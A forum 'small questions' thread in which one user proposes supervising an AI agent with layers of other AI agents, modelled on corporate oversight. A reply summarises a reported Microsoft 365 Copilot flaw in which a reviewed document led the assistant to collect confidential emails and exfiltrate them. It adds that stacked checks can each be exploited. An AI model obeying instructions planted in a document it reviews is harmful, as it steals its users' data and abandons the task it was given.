Do you have a dumb question that you're kind of embarrassed to ask in the main thread? Is there something you're just not sure about?
This is your opportunity to ask questions. No question too simple or too silly.
Culture war topics are accepted, and proposals for a better intro post are appreciated.

Jump in the discussion.
No email address required.
Notes -
I was thinking about AI alignment recently.
In a corporation you have employees that are instructed to do tasks in a certain way and are subject to work rules that will result in punishment if they violate them. The corporation is also subject to outside oversight to ensure that they are following laws. For example, an employee might be responsible for properly disposing of hazardous waste. They can’t just dump it down the drain. They have a boss that makes sure they are following the company’s waste disposal policy. There is also chain of custody paperwork that the company retains. If the waste was contaminating local water sources then people could notify the EPA to investigate the company (including the boss and employee).
Could you setup multiple AI agents in a similar way to make sure the main agent acts in alignment with human interests? To extend the analogy:
What flaws are there with my ideas around AI alignment other than increased costs?
Literally just yesterday I read about this: https://www.adamlogue.com/microsoft-365-copilot-arbitrary-data-exfiltration-via-mermaid-diagrams-fixed/ TLDR for those who doesn't enjoy the technical details: asking Microsoft AI to review some document may result in all your data (i.e. all corporate data accessible to you and Office 365 tools) be stolen and exfiltrated to arbitrary third party. One of the proposed solutions for this (besides the immediate short-term fix) is what you are talking about - mechanisms that ensure AI stays at the original task and does not decide "screw that whole document explaining thing, I must instead just gather all confidential emails and send them to dr_evil@evil.com". Of course, having N levels of checks only means you need N+1 exploits to break this, which somebody with enough time and motivation will eventually find.
More options
Context Copy link
More options
Context Copy link